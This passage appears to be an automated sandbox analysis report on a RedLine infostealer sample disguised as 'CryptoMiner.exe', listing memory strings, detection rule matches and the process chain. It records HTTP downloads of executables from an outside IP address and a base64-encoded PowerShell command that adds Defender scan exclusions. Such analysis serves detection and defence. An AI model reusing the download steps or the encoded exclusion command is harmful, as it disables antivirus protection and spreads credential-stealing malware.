                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id23
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id23Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id24
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.659905866.0000000002FA6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id24Response
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.657986199.0000000002DFA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: CryptoMiner.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                    Source: CryptoMiner.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                    Source: CryptoMiner.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                    Source: powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.dr | String found in binary or memory: http://www.digicert.com/CPS0
                    Source: fname.exe.12.dr | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: fname.exe.12.dr | String found in binary or memory: http://www.symauth.com/cps0(
                    Source: fname.exe.12.dr | String found in binary or memory: http://www.symauth.com/rpa00
                    Source: fname.exe.12.dr | String found in binary or memory: http://www.vmware.com/0
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.dr | String found in binary or memory: http://www.vmware.com/0/
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: CryptoMiner.exe, 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, CryptoMiner.exe, 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000000.543024251.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.ip.sb/ip
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: powershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: CryptoMiner.exe, fname.exe.12.dr | String found in binary or memory: https://d.symcb.com/cps0%
                    Source: CryptoMiner.exe, fname.exe.12.dr | String found in binary or memory: https://d.symcb.com/rpa0
                    Source: CryptoMiner.exe | String found in binary or memory: https://d.symcb.com/rpa0.
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.dr | String found in binary or memory: https://pidgin.im0
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.dr | String found in binary or memory: https://sectigo.com/CPS0
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.dr | String found in binary or memory: https://www.digicert.com/CPS0
                    Source: InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknown | DNS traffic detected: queries for: ip-api.com
                    Source: global traffic | HTTP traffic detected: GET /asdasdasd.exe HTTP/1.1
                        Host: 45.9.20.31
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /rigx.exe HTTP/1.1
                        Host: 45.9.20.31
                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1
                        Host: ip-api.com
                        Connection: Keep-Alive
                    Source: unknown | TCP traffic detected without corresponding DNS query: 65.21.213.209

                    System Summary

                    Source: 0.3.CryptoMiner.exe.d730000.1.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 12.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.CryptoMiner.exe.ae3760.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.CryptoMiner.exe.d730000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.CryptoMiner.exe.d730000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.CryptoMiner.exe.ae3760.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 12.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: 0_2_00DA98E4
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: 0_2_00E0A04F
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: 0_2_00DA7901
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: 0_2_00D9E2DE
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: 0_2_00DA8A7F
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: 0_2_00D97221
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: 0_2_00DA83A3
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: 0_2_00DA7E52
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: 0_2_00DA6F87
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06977328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06977008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06970040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06975170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_0697E838
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_0697F5C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06979210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06CD8CC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06CD9940
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06CD17B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06CD0768
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06CD076A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06CD925D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06CD8CB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06CD6961
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06CD6970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 12_2_06CD2938
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Code function: 20_2_00CDD2AF
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Code function: 20_2_00CB2247
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Code function: 20_2_00DD7CC0
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Code function: 20_2_00CB40A4
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Code function: 20_2_00DD9903
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Code function: 20_2_00DCCA92
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Code function: 20_2_00DD97E3
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Code function: 20_2_00DC57E3
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Code function: 20_2_00DC83A0
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Code function: 20_2_00CDF721
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E51499
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E5C3D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E5E330
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E5CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E51DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E50B38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E50858
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E51590
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E5C088
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E51091
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E52108
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E51E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E50B72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_06E50B28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_09D77530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | Code function: 22_2_09D77520
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe | Code function: 23_2_00007FF9EFE41449
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe | Code function: 23_2_00007FF9EFE453A3
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe | Code function: 23_2_00007FF9EFE48E80
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe | Code function: 23_2_00007FF9EFE45543
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 29_2_00007FF9EFE41958
                    Source: CryptoMiner.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: CryptoMiner.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 0.3.CryptoMiner.exe.d730000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 12.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.CryptoMiner.exe.ae3760.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.CryptoMiner.exe.d730000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.CryptoMiner.exe.d730000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.CryptoMiner.exe.ae3760.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 12.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: String function: 00D8EC50 appears 49 times
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Code function: String function: 00D9D660 appears 38 times
                    Source: filename.exe.12.dr | Static PE information: No import functions for PE file found
                    Source: CryptoMiner.exe, 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFlighting.exe4 vs CryptoMiner.exe
                    Source: CryptoMiner.exe, 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFlighting.exe4 vs CryptoMiner.exe
                    Source: CryptoMiner.exe, 00000000.00000002.548824836.0000000000E98000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBtderogatnive.exe, vs CryptoMiner.exe
                    Source: CryptoMiner.exe | Binary or memory string: OriginalFilenameBtderogatnive.exe, vs CryptoMiner.exe
                    Source: CryptoMiner.exe | Static PE information: invalid certificate
                    Source: CryptoMiner.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: CryptoMiner.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Local\Yandex
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@15/5@1/3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: CryptoMiner.exe | ReversingLabs: Detection: 16%
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\CryptoMiner.exe "C:\Users\user\Desktop\CryptoMiner.exe"
                    Source: C:\Users\user\Desktop\CryptoMiner.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\AppData\Local\Temp\fname.exe "C:\Users\user\AppData\Local\Temp\fname.exe"
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\fname.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user\AppData\Local\Temp\filename.exe"
                    Source: C:\Users\user\AppData\Local\Temp\filename.exe | Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
